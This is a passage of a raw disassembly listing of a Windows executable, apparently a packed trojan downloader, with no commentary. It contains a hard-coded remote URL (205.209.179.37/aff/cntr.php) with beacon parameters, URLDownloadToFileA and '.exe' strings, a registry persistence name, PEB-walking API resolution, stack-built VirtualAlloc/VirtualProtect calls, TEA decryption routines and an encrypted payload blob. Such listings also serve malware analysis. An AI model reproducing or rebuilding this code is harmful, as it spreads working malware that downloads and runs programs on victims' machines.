sub_401D30 endp
; ---------------------------------------------------------------------------
db 2 dup(90h)
dd 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_401D3C proc near ; CODE XREF: sub_40107A+13�p
jmp ds:dword_4041A4
sub_401D3C endp
; ---------------------------------------------------------------------------
align 8
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_401D48 proc near ; CODE XREF: .text:00401364�p
jmp ds:dword_4041A8
sub_401D48 endp
; ---------------------------------------------------------------------------
db 2 dup(90h)
dd 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_401D54 proc near ; CODE XREF: start+16�p
jmp ds:dword_4041AC
sub_401D54 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_401D60 proc near ; CODE XREF: start+17A�p start+1A4�p ...
jmp ds:dword_4041B0
sub_401D60 endp
; ---------------------------------------------------------------------------
db 2 dup(90h)
dd 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_401D6C proc near ; CODE XREF: start+160�p start+2C8�p ...
jmp ds:dword_4041B4
sub_401D6C endp
; ---------------------------------------------------------------------------
align 8
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_401D78 proc near ; CODE XREF: start+6E1�p
jmp ds:dword_4041B8
sub_401D78 endp
; ---------------------------------------------------------------------------
db 2 dup(90h)
dd 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_401D84 proc near ; CODE XREF: start+48D�p
jmp ds:dword_4041C4
sub_401D84 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_401D90 proc near ; CODE XREF: start+DA�p start+4B9�p
jmp ds:dword_4041C8
sub_401D90 endp
; ---------------------------------------------------------------------------
db 2 dup(90h)
dd 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_401D9C proc near ; CODE XREF: start+9F�p
jmp ds:dword_4041CC
sub_401D9C endp
; ---------------------------------------------------------------------------
align 8
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_401DA8 proc near ; CODE XREF: start+CF�p
jmp ds:dword_4041D0
sub_401DA8 endp
; ---------------------------------------------------------------------------
db 2 dup(90h)
dd 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_401DB4 proc near ; CODE XREF: start+4AE�p
jmp ds:dword_4041D4
sub_401DB4 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_401DC0 proc near ; CODE XREF: start+539�p
jmp ds:dword_4041E0
sub_401DC0 endp
; ---------------------------------------------------------------------------
db 2 dup(90h)
dd 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_401DCC proc near ; CODE XREF: start+526�p
jmp ds:dword_4041E4
sub_401DCC endp
; ---------------------------------------------------------------------------
align 8
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_401DD8 proc near ; CODE XREF: start+50C�p
jmp ds:dword_4041E8
sub_401DD8 endp
; ---------------------------------------------------------------------------
db 2 dup(90h)
dd 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_401DE4 proc near ; CODE XREF: start+553�p
jmp ds:dword_4041EC
sub_401DE4 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_401DF0 proc near ; CODE XREF: start+2F�p
jmp ds:dword_4041F0
sub_401DF0 endp
; ---------------------------------------------------------------------------
db 2 dup(90h)
dd 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_401DFC proc near ; CODE XREF: start+18E�p start+1EA�p ...
jmp ds:dword_4041FC
sub_401DFC endp
; ---------------------------------------------------------------------------
align 8
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_401E08 proc near ; CODE XREF: sub_401219+49�p
jmp ds:dword_404200
sub_401E08 endp
; ---------------------------------------------------------------------------
db 2 dup(90h)
dd 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_401E14 proc near ; CODE XREF: start+87A�p
jmp ds:dword_404204
sub_401E14 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_401E20 proc near ; CODE XREF: start+86F�p
jmp ds:dword_404208
sub_401E20 endp
; ---------------------------------------------------------------------------
db 2 dup(90h)
dd 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_401E2C proc near ; CODE XREF: start+427�p
jmp ds:dword_40420C
sub_401E2C endp
; ---------------------------------------------------------------------------
align 8
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_401E38 proc near ; CODE XREF: sub_401219+74�p
jmp ds:dword_404210
sub_401E38 endp
; ---------------------------------------------------------------------------
db 2 dup(90h)
dd 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_401E44 proc near ; CODE XREF: start+130�p start+465�p
jmp ds:dword_404214
sub_401E44 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_401E50 proc near ; CODE XREF: start+72B�p
jmp ds:dword_404218
sub_401E50 endp
; ---------------------------------------------------------------------------
db 2 dup(90h)
dd 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_401E5C proc near ; CODE XREF: start+357�p
jmp ds:dword_40421C
sub_401E5C endp
; ---------------------------------------------------------------------------
align 8
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_401E68 proc near ; CODE XREF: start+F9�p start+30A�p ...
jmp ds:dword_404220
sub_401E68 endp
; ---------------------------------------------------------------------------
db 2 dup(90h)
dd 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_401E74 proc near ; CODE XREF: start+117�p
jmp ds:dword_404224
sub_401E74 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_401E80 proc near ; CODE XREF: start+45A�p
jmp ds:dword_404228
sub_401E80 endp
; ---------------------------------------------------------------------------
db 2 dup(90h)
dd 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_401E8C proc near ; CODE XREF: start+699�p
jmp ds:dword_40422C
sub_401E8C endp
; ---------------------------------------------------------------------------
align 8
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_401E98 proc near ; CODE XREF: sub_40109A+149�p
jmp ds:dword_404230
sub_401E98 endp
; ---------------------------------------------------------------------------
db 2 dup(90h)
dd 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_401EA4 proc near ; CODE XREF: start:loc_40152D�p
; start+795�p
jmp ds:dword_404234
sub_401EA4 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_401EB0 proc near ; CODE XREF: sub_40109A+102�p
; sub_40109A+11C�p ...
jmp ds:dword_404238
sub_401EB0 endp
; ---------------------------------------------------------------------------
db 2 dup(90h)
dd 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_401EBC proc near ; CODE XREF: .text:00401342�p
jmp ds:dword_40423C
sub_401EBC endp
; ---------------------------------------------------------------------------
align 8
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_401EC8 proc near ; CODE XREF: sub_401C28+17�p
jmp ds:dword_404240
sub_401EC8 endp
; ---------------------------------------------------------------------------
db 2 dup(90h)
dd 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_401ED4 proc near ; CODE XREF: start+2AD�p start+323�p
jmp ds:dword_404244
sub_401ED4 endp
; ---------------------------------------------------------------------------
align 10h
db 0
_text ends
; Section 2. (virtual address 00002000)
; Virtual size : 00000327 ( 807.)
; Section size in file : 00000327 ( 807.)
; Offset to raw data for section: 00002000
; Flags C0000080: Bss Readable Writable
; Alignment : default
; ===========================================================================
; Segment type: Uninitialized
; Segment permissions: Read/Write
_bss segment para public 'BSS' use32
assume cs:_bss
;org 402000h
assume es:nothing, ss:nothing, ds:_data, fs:nothing, gs:nothing
dword_402000 dd 7613386Eh ; DATA XREF: start+6A�w start+2F2�r ...
dword_402004 dd 0C8h dup(0) ; DATA XREF: .data:00403004�o
db 3 dup(0)
_bss ends
; Section 3. (virtual address 00003000)
; Virtual size : 00000F91 ( 3985.)
; Section size in file : 00000F91 ( 3985.)
; Offset to raw data for section: 00003000
; Flags C0000040: Data Readable Writable
; Alignment : default
; ===========================================================================
; Segment type: Pure data
; Segment permissions: Read/Write
_data segment para public 'DATA' use32
assume cs:_data
;org 403000h
dd offset dword_402000
dd offset dword_402004
dd 8000h, 0
dword_403010 dd 0 ; DATA XREF: sub_40109A+F6�w
; sub_40109A+110�w ...
dword_403014 dd 12FF74h ; DATA XREF: sub_401219+60�w
dd 0
dword_40301C dd 0 ; DATA XREF: sub_401219+B�o
dword_403020 dd 1 ; DATA XREF: sub_401219+44�o
; sub_401219+5A�r
dword_403024 dd 146798h ; DATA XREF: sub_401219+3F�o
; sub_401219+54�r
dword_403028 dd 146208h ; DATA XREF: sub_401219+3A�o
; sub_401219+4E�r
dword_40302C dd 0 ; DATA XREF: sub_40109A:loc_4011F8�r
; sub_40109A:loc_401208�r
dword_403030 dd 0 ; DATA XREF: sub_40109A+62�w
dword_403034 dd 0 ; DATA XREF: sub_40109A+6C�w
; sub_40109A+87�r ...
dword_403038 dd 0 ; DATA XREF: sub_40109A+74�w
dword_40303C dd 14h dup(0) ; DATA XREF: sub_40109A+81�o
; sub_40109A+8F�o
dword_40308C dd 0 ; DATA XREF: sub_40109A+11�w
dword_403090 dd 0 ; DATA XREF: sub_40109A+16�w
; sub_40109A+32�w
dword_403094 dd 353031h, 6469h ; DATA XREF: start+292�o start+4EA�o
db 2 dup(0)
aHttp205_209_17 db 'http://205.209.179.37/aff/cntr.php',0 ; DATA XREF: start+2A8�o
align 4
dd 5Ah dup(0)
db 2 dup(0)
aGagagaradio db 'gagagaradio',0 ; DATA XREF: .text:loc_401369�o
align 4
db 0
aSvcp_csv db 'svcp.csv',0 ; DATA XREF: start+2E4�o start+305�o ...
align 4
dd 0
aY db 'y=',0 ; DATA XREF: start+82A�o
asc_40324F db '&x=',0 ; DATA XREF: start+7F5�o
aE db 'e=',0 ; DATA XREF: start+774�o
a3 db '3',0 ; DATA XREF: start:loc_401A7D�o
a2 db '2',0 ; DATA XREF: start:loc_401A6D�o
a_exe db '.exe',0 ; DATA XREF: start+633�o
a1 db '1',0 ; DATA XREF: start:loc_4018E3�o
; start+6EA�o
a0 db '0',0 ; DATA XREF: start+55D�o
; start:loc_4018F6�o
a64_233_185_114 db '64.233.185.114',0 ; DATA XREF: start+534�o
a_ db '_',0 ; DATA XREF: start+4DC�o start+4F8�o ...
asc_403274 db '!!',0 ; DATA XREF: start:loc_401831�o
aW db 'w',0 ; DATA XREF: start+432�o
asc_403279 db '|',0 ; DATA XREF: start+2A3�o start+31C�o
aD db 'd=',0 ; DATA XREF: start+281�o
aC db 'c=',0 ; DATA XREF: start+24C�o
aB db 'b=',0 ; DATA XREF: start+217�o
dbl_403284 dq 1.0e2 ; DATA XREF: start+1D2�r start+7AD�r
dd 2 dup(0)
dbl_403294 dq 3.2768e4 ; DATA XREF: start+1CC�r start+7A7�r
byte_40329C db 26h, 0 ; DATA XREF: start+1A9�o start+23B�o ...
word_40329E dw 3D61h ; DATA XREF: start+16E�o
db 0
byte_4032A1 db 3Fh, 0 ; DATA XREF: start+154�o start+763�o
byte_4032A3 db 72h ; DATA XREF: start+EF�o start+300�o
db 0
aWinsub_xml db 'winsub.xml',0 ; DATA XREF: start+F4�o start+437�o
aWindowssubvers db 'WindowsSubVersion',0 ; DATA XREF: start+C4�o start+4A3�o
byte_4032C2 db 0 ; DATA XREF: start+95�o start+483�o
aUrldownloadtof db 'URLDownloadToFileA',0 ; DATA XREF: start:loc_4013D2�o
aUrlmon_dll db 'urlmon.dll',0 ; DATA XREF: start:loc_4013B5�o
db '://',0
align 4
dd 0AFh dup(0)
db 3 dup(0)
byte_4035A7 db 0 ; DATA XREF: sub_4046FF+6�o
dd 0Ah dup(0)
dword_4035D0 dd 0 ; DATA XREF: sub_404674+21�w
; sub_4046FF+D�r
dword_4035D4 dd 0 ; DATA XREF: sub_404674+83�w
; sub_4046FF+13�r
dd 26Eh dup(0)
db 0
_data ends
; Section 4. (virtual address 00004000)
; Virtual size : 00002000 ( 8192.)
; Section size in file : 00002000 ( 8192.)
; Offset to raw data for section: 00004000
; Flags E0000040: Data Executable Readable Writable
; Alignment : default
; ===========================================================================
; Segment type: Pure code
; Segment permissions: Read/Write/Execute
_idata segment para public 'CODE' use32
assume cs:_idata
;org 404000h
assume es:nothing, ss:nothing, ds:_data, fs:nothing, gs:nothing
dword_404000 dd 40B8h, 2 dup(0) ; DATA XREF: .idata:004044B0�o
; .idata:004044B4�o ...
dword_40400C dd 44A0h, 4184h, 40F8h, 2 dup(0) ; DATA XREF: .idata:004044F8�o
; .idata:004044FC�o ...
dd 44E8h, 41C4h, 4114h, 2 dup(0)
dd 450Ch, 41E0h, 4130h, 2 dup(0)
dd 452Ch, 41FCh, 1Ah dup(0)
dd 424Ch, 4260h, 4278h, 428Ch, 42A0h, 42B8h, 42C8h, 42D8h
dd 42E8h, 42F4h, 430Ch, 431Ch, 4328h, 4334h, 2 dup(0)
dd 4348h, 435Ch, 436Ch, 437Ch, 4390h, 2 dup(0)
dd 43A4h, 43B0h, 43B8h, 43C4h, 43D0h, 2 dup(0)
dd 43E0h, 43E8h, 43F8h, 4404h, 4410h, 4418h, 4420h, 442Ch
dd 4434h, 443Ch, 4444h, 444Ch, 4458h, 4464h, 446Ch, 4474h
dd 4480h, 4488h, 4494h, 2 dup(0)
dword_404184 dd 77E7C938h ; DATA XREF: sub_401CDC�r
dword_404188 dd 77E77CC4h ; DATA XREF: sub_401CE8�r
dword_40418C dd 77E79F93h ; DATA XREF: sub_401CF4�r
dword_404190 dd 77E7A5FDh ; DATA XREF: sub_401D00�r
dword_404194 dd 77E704FCh ; DATA XREF: sub_401D0C�r
dword_404198 dd 77E805D8h ; DATA XREF: sub_401D18�r
dword_40419C dd 77E8074Ah ; DATA XREF: .text:00401D24�r
dword_4041A0 dd 77E776A0h ; DATA XREF: sub_401D30�r
dword_4041A4 dd 77F6183Eh ; DATA XREF: sub_401D3C�r
dword_4041A8 dd 77E705C5h ; DATA XREF: sub_401D48�r
dword_4041AC dd 77E7C2C4h ; DATA XREF: sub_401D54�r
dword_4041B0 dd 77E74155h ; DATA XREF: sub_401D60�r
dword_4041B4 dd 77E73167h ; DATA XREF: sub_401D6C�r
dword_4041B8 dd 77E61BB8h ; DATA XREF: sub_401D78�r
dd 2 dup(0)
dword_4041C4 dd 77DD590Bh ; DATA XREF: sub_401D84�r
dword_4041C8 dd 77DD189Ah ; DATA XREF: sub_401D90�r
dword_4041CC dd 77DD22EAh ; DATA XREF: sub_401D9C�r
dword_4041D0 dd 77DD23D7h ; DATA XREF: sub_401DA8�r
dword_4041D4 dd 77DD59F0h ; DATA XREF: sub_401DB4�r
align 10h
dword_4041E0 dd 71AB12F8h ; DATA XREF: sub_401DC0�r
dword_4041E4 dd 71AB1746h ; DATA XREF: sub_401DCC�r
dword_4041E8 dd 71AB3C22h ; DATA XREF: sub_401DD8�r
dword_4041EC dd 71AB3E5Dh ; DATA XREF: sub_401DE4�r
dword_4041F0 dd 71AB41DAh ; DATA XREF: sub_401DF0�r
dd 2 dup(0)
dword_4041FC dd 73D96FEBh ; DATA XREF: sub_401DFC�r
dword_404200 dd 73D91C28h ; DATA XREF: sub_401E08�r
dword_404204 dd 73D92B86h ; DATA XREF: sub_401E14�r
dword_404208 dd 73D9B2CAh ; DATA XREF: sub_401E20�r
dword_40420C dd 73D9BBAAh ; DATA XREF: sub_401E2C�r
dword_404210 dd 73D91F60h ; DATA XREF: sub_401E38�r
dword_404214 dd 73D9BD6Dh ; DATA XREF: sub_401E44�r
dword_404218 dd 73D9BE10h ; DATA XREF: sub_401E50�r
dword_40421C dd 73D9BE97h ; DATA XREF: sub_401E5C�r
dword_404220 dd 73D95765h ; DATA XREF: sub_401E68�r
dword_404224 dd 73D9C32Ch ; DATA XREF: sub_401E74�r
dword_404228 dd 73D9C7EAh ; DATA XREF: sub_401E80�r
dword_40422C dd 73D9D5E0h ; DATA XREF: sub_401E8C�r
dword_404230 dd 73D9242Ch ; DATA XREF: sub_401E98�r
dword_404234 dd 73D9DBAFh ; DATA XREF: sub_401EA4�r
dword_404238 dd 73D92226h ; DATA XREF: sub_401EB0�r
dword_40423C dd 73D9DBA2h ; DATA XREF: sub_401EBC�r
dword_404240 dd 73D9E69Ch ; DATA XREF: sub_401EC8�r
dword_404244 dd 73D9F498h ; DATA XREF: sub_401ED4�r
dd 0
dd 654700EDh, 6D6F4374h, 646E616Dh, 656E694Ch, 41h, 65470115h
dd 72754374h, 746E6572h, 65726854h, 64496461h, 0
dd 65470149h, 646F4D74h, 48656C75h, 6C646E61h, 4165h, 65470167h
dd 6F725074h, 64644163h, 73736572h, 0
dd 65470188h, 73795374h, 446D6574h, 63657269h, 79726F74h
dd 41h, 6F4C0203h, 694C6461h, 72617262h, 4179h, 704F0230h
dd 754D6E65h, 41786574h, 0
dd 65520263h, 7361656Ch, 74754D65h, 7865h, 74520278h, 776E556Ch
dd 646E69h, 65530297h, 72754374h, 746E6572h, 65726944h
dd 726F7463h, 4179h, 7243004Fh, 65746165h, 6574754Dh, 4178h
dd 736C0336h, 61637274h, 4174h, 736C033Fh, 70637274h, 4179h
dd 72430054h, 65746165h, 636F7250h, 41737365h, 0
dd 65520173h, 65724367h, 4B657461h, 78457965h, 41h, 65520176h
dd 6F6C4367h, 654B6573h, 79h, 6552017Bh, 65704F67h, 79654B6Eh
dd 417845h, 65520186h, 65755167h, 61567972h, 4565756Ch
dd 4178h, 65520192h, 74655367h, 756C6156h, 41784565h, 0
dd 6E69000Eh, 615F7465h, 726464h, 7468000Fh, 736E6Fh, 6F730001h
dd 74656B63h, 0
dd 6F63001Eh, 63656E6Eh, 74h, 53570031h, 61745341h, 70757472h
dd 0
dd 695F00E8h, 616F74h, 5F5F0018h, 4D746547h, 416E6961h
dd 736772h, 735F0181h, 7065656Ch, 0
dd 755F01D6h, 6E696C6Eh, 6Bh, 746101FEh, 696Fh, 7865020Ah
dd 7469h, 6366020Dh, 65736F6Ch, 0
dd 6566020Eh, 666Fh, 67660213h, 737465h, 6F660217h, 6E6570h
dd 7266021Ch, 646165h, 77660225h, 65746972h, 0
dd 656D0256h, 7465736Dh, 0
dd 61720260h, 657369h, 61720261h, 646Eh, 6973026Ah, 6C616E67h
dd 0
dd 7273026Fh, 646E61h, 74730272h, 72686372h, 0
dd 74730282h, 6B6F7472h, 0
dd 4E52454Bh, 32334C45h, 6C6C642Eh, 0
dd offset dword_404000
dd offset dword_404000
dd offset dword_404000
dd offset dword_404000
dd offset dword_404000
dd offset dword_404000
dd offset dword_404000
dd offset dword_404000
dd offset dword_404000
dd offset dword_404000
dd offset dword_404000
dd offset dword_404000
dd offset dword_404000
dd offset dword_404000
dd 41564441h, 32334950h, 4C4C442Eh, 0
dd offset dword_40400C+8
dd offset dword_40400C+8
dd offset dword_40400C+8
dd offset dword_40400C+8
dd offset dword_40400C+8
dd 5F325357h, 442E3233h, 4C4Ch, 5 dup(404028h), 44545243h
dd 442E4C4Ch, 4C4Ch, 13h dup(40403Ch), 78468900h, 34F7858Bh
dd 46890040h, 0CF858B7Ch, 89004034h, 0A086h, 0D3858B00h
dd 89004034h, 0A486h
db 0, 61h, 0C3h
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
sub esp, 10h
mov dword ptr [ebp-10h], 74726956h
mov dword ptr [ebp-0Ch], 416C6175h
mov dword ptr [ebp-8], 636F6C6Ch
mov byte ptr [ebp-4], 0
push 4
push 1000h
push 6000h
push 0
lea eax, [ebp-10h]
call sub_4046FF
leave
retn
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4045E2 proc near ; CODE XREF: .idata:0040479F�p
; .idata:00404D7F�p
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = word ptr -4
var_2 = byte ptr -2
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 14h
mov [ebp+var_14], 0
mov [ebp+var_10], 74726956h
mov [ebp+var_C], 506C6175h
mov [ebp+var_8], 65746F72h
mov [ebp+var_4], 7463h
mov [ebp+var_2], 0
pusha
lea eax, [ebp+var_14]
push eax
push 40h
push [ebp+arg_4]
push [ebp+arg_0]
lea eax, [ebp+var_10]
call sub_4046FF
popa
leave
retn 8
sub_4045E2 endp
; ---------------------------------------------------------------------------
dd 0C8h, 2 dup(0)
dd 1219h, 4400h, 0
dd 400000h, 2 dup(4000h), 584h, 2 dup(0)
dd 400000h, 0
dd offset sub_401219
align 8
dd 1373h, 5000h, 0
; =============== S U B R O U T I N E =======================================
sub_404674 proc near ; CODE XREF: .idata:00404C5F�p
pusha
call $+5
pop ebp
sub ebp, 40351Dh
mov ebx, large fs:30h
mov ebx, [ebx+0Ch]
mov ebx, [ebx+1Ch]
mov ebx, [ebx]
mov ebx, [ebx+8]
loc_404693: ; CODE XREF: sub_404674+6F�j
mov edx, ebx
mov ss:dword_4035D0[ebp], edx
mov ebx, edx
mov edi, [ebx+3Ch]
add edi, edx
add ebx, [edi+78h]
mov ecx, [ebx+18h]
mov esi, [ebx+20h]
mov edi, [ebx+24h]
add esi, edx
add edi, edx
cld
loc_4046B3: ; CODE XREF: sub_404674+59�j
lodsd
add eax, edx
push ecx
push edi
xchg eax, esi
lea edi, [ebp+4035C1h]
mov ecx, 0Fh
repe cmpsb
xchg eax, esi
pop edi
pop ecx
jz short loc_4046E5
inc edi
inc edi
loop loc_4046B3
mov ebx, large fs:30h
mov ebx, [ebx+0Ch]
mov ebx, [ebx+1Ch]
mov ebx, [ebx]
mov ebx, [ebx+8]
mov edx, ebx
jmp short loc_404693
; ---------------------------------------------------------------------------
loc_4046E5: ; CODE XREF: sub_404674+55�j
xor eax, eax
mov ax, [edi]
shl eax, 2
mov esi, [ebx+1Ch]
add esi, edx
add esi, eax
lodsd
add eax, edx
mov ss:dword_4035D4[ebp], eax
popa
retn
sub_404674 endp
; =============== S U B R O U T I N E =======================================
sub_4046FF proc near ; CODE XREF: .idata:004045DB�p
; sub_4045E2+3C�p ...
call $+5
pop edx
sub edx, offset byte_4035A7
push eax
push dword_4035D0[edx]
call dword_4035D4[edx]
jmp eax
sub_4046FF endp
; ---------------------------------------------------------------------------
align 4
dd 65470000h, 6F725074h, 64644163h, 73736572h, 0E6000000h
dd 0E7A5FD77h
db 77h
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
sub esp, 8
mov dword ptr [ebp-8], 0
mov dword ptr [ebp-4], 0
pusha
mov esi, [ebp+8]
add esi, [esi+3Ch]
movzx edx, word ptr [esi+6]
loc_404754: ; CODE XREF: .idata:004047B0�j
dec edx
push edx
push esi
call sub_404802
lea ebx, [eax]
inc ebx
cmp dword ptr [ebx], 63727372h
jz short loc_4047AE
mov ebx, [eax+0Ch]
cmp dword ptr [ebp+10h], 1
jz short loc_404773
mov ebx, [eax+14h]
loc_404773: ; CODE XREF: .idata:0040476E�j
mov ecx, [eax+10h]
test ecx, ecx
jz short loc_4047AE
mov eax, [ebp+18h]
cmp ebx, eax
jnz short loc_404788
mov eax, [ebp+14h]
sub eax, ebx
mov ecx, eax
loc_404788: ; CODE XREF: .idata:0040477F�j
add ebx, [ebp+8]
cmp dword ptr [ebp+10h], 1
jz short loc_40479D
push dword ptr [ebp+0Ch]
push ecx
push ebx
call sub_4047BA
jmp short loc_4047AE
; ---------------------------------------------------------------------------
loc_40479D: ; CODE XREF: .idata:0040478F�j
push ecx
push ebx
call sub_4045E2
push dword ptr [ebp+0Ch]
push ecx
push ebx
call sub_4047DE
loc_4047AE: ; CODE XREF: .idata:00404765�j
; .idata:00404778�j ...
test edx, edx
jnz short loc_404754
mov eax, [ebp-4]
popa
leave
retn 14h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4047BA proc near ; CODE XREF: .idata:00404796�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
pusha
mov edx, [ebp+arg_0]
mov eax, [ebp+arg_8]
mov ecx, [ebp+arg_4]
mov edi, [ebp+arg_4]
loc_4047CA: ; CODE XREF: sub_4047BA+16�j
sub edi, 8
cmp edi, 8
jge short loc_4047CA
sub ecx, edi
call sub_40482D
popa
leave
retn 0Ch
sub_4047BA endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4047DE proc near ; CODE XREF: .idata:004047A9�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
pusha
mov edx, [ebp+arg_0]
mov eax, [ebp+arg_8]
mov ecx, [ebp+arg_4]
mov edi, [ebp+arg_4]
loc_4047EE: ; CODE XREF: sub_4047DE+16�j
sub edi, 8
cmp edi, 8
jge short loc_4047EE
sub ecx, edi
call sub_404843
popa
leave
retn 0Ch
sub_4047DE endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_404802 proc near ; CODE XREF: .idata:00404757�p
; .idata:00404D3B�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push edx
push esi
push ebx
push ecx
mov esi, [ebp+arg_0]
mov ebx, [esi+74h]
shl ebx, 3
mov eax, [ebp+arg_4]
mov ecx, 28h
mul ecx
add esi, 78h
add esi, ebx
add esi, eax
mov eax, esi
pop ecx
pop ebx
pop esi
pop edx
leave
retn 8
sub_404802 endp
; =============== S U B R O U T I N E =======================================
sub_40482D proc near ; CODE XREF: sub_4047BA+1A�p
pusha
mov esi, eax
mov edi, edx
loc_404832: ; CODE XREF: sub_40482D+12�j
pusha
call sub_404859
popa
add edi, 8
sub ecx, 7
loop loc_404832
popa
retn
sub_40482D endp
; =============== S U B R O U T I N E =======================================
sub_404843 proc near ; CODE XREF: sub_4047DE+1A�p
pusha
mov esi, eax
mov edi, edx
loc_404848: ; CODE XREF: sub_404843+12�j
pusha
call sub_4048AA
popa
add edi, 8
sub ecx, 7
loop loc_404848
popa
retn
sub_404843 endp
; =============== S U B R O U T I N E =======================================
sub_404859 proc near ; CODE XREF: sub_40482D+6�p
push edi
mov ebx, [edi]
mov ecx, [edi+4]
xor eax, eax
mov edx, 9E3779B9h
mov edi, 20h
loc_40486B: ; CODE XREF: sub_404859+48�j
add eax, edx
mov ebp, ecx
shl ebp, 4
add ebx, ebp
mov ebp, [esi]
xor ebp, ecx
add ebx, ebp
mov ebp, ecx
shr ebp, 5
xor ebp, eax
add ebx, ebp
add ebx, [esi+4]
mov ebp, ebx
shl ebp, 4
add ecx, ebp
mov ebp, [esi+8]
xor ebp, ebx
add ecx, ebp
mov ebp, ebx
shr ebp, 5
xor ebp, eax
add ecx, ebp
add ecx, [esi+0Ch]
dec edi
jnz short loc_40486B
pop edi
mov [edi], ebx
mov [edi+4], ecx
retn
sub_404859 endp
; =============== S U B R O U T I N E =======================================
sub_4048AA proc near ; CODE XREF: sub_404843+6�p
push edi
mov ebx, [edi]
mov ecx, [edi+4]
mov edx, 9E3779B9h
mov eax, edx
shl eax, 5
mov edi, 20h
loc_4048BF: ; CODE XREF: sub_4048AA+4B�j
mov ebp, ebx
shl ebp, 4
sub ecx, ebp
mov ebp, [esi+8]
xor ebp, ebx
sub ecx, ebp
mov ebp, ebx
shr ebp, 5
xor ebp, eax
sub ecx, ebp
sub ecx, [esi+0Ch]
mov ebp, ecx
shl ebp, 4
sub ebx, ebp
mov ebp, [esi]
xor ebp, ecx
sub ebx, ebp
mov ebp, ecx
shr ebp, 5
xor ebp, eax
sub ebx, ebp
sub ebx, [esi+4]
sub eax, edx
dec edi
jnz short loc_4048BF
pop edi
mov [edi], ebx
mov [edi+4], ecx
retn
sub_4048AA endp
; ---------------------------------------------------------------------------
dw 0AE8Dh
dd 438F0056h, 59F3024Dh, 2504010Bh, 92730061h, 6684A32Bh
dd 910BE28Ch, 0AD78CDD9h, 0D70B319Fh, 169D868Fh, 330D016Ah
dd 804EB899h, 0DDBBC6E3h, 3AF0D6ABh, 798D7233h, 1F30FFEFh
dd 7612BCFCh, 7EDADDD6h, 0E3BA4B73h, 0C3B8E88Ah, 9CF18Fh
dd 4685FAB0h, 39D17D3h, 0DC8394B3h, 1AE03DC0h, 616BD0FBh
dd 8C016727h, 0D2726D02h, 0E967F077h, 2EF52BE0h, 0F579FB46h
dd 0F8505769h, 7B3C6DC1h, 0E0266B42h, 4FDF0BDEh, 3123BBC4h
dd 504FA05Ch, 3CBF6794h, 10C0E845h, 0CC76AF40h, 0FE79258Dh
dd 42923970h, 0DCDE717Fh, 429E9D9Bh, 3ED012F6h, 0EB95DE76h
dd 2776EC41h, 0B90439F1h, 3206D6F2h, 394382CBh, 612C4AACh
dd 191FDA66h, 0BF391AF8h, 0F3541E6h, 0BD31AC90h, 0A358DB1Eh
dd 2C0DA56Ah, 63EA783Ah, 44865FADh, 765B9A2h, 0A651837Fh
dd 0C816DCF1h, 0BEC41050h, 1ABE7F77h, 39AF9E78h, 0C5587022h
dd 9046DBF0h, 0CDF506C1h, 6022F636h, 8EFE5B2Dh, 96EDDB6Fh
dd 1BCC977Ch, 804DD1E2h, 0EC089DE2h, 0EDC2AD9Ch, 621F08Eh
dd 0C922F087h, 78E4454h, 5A227868h, 0EA2AD699h, 0D26E8725h
dd 8EE8BC3h, 0C71309BFh, 2F644FFEh, 0AF73D717h, 5CD4537h
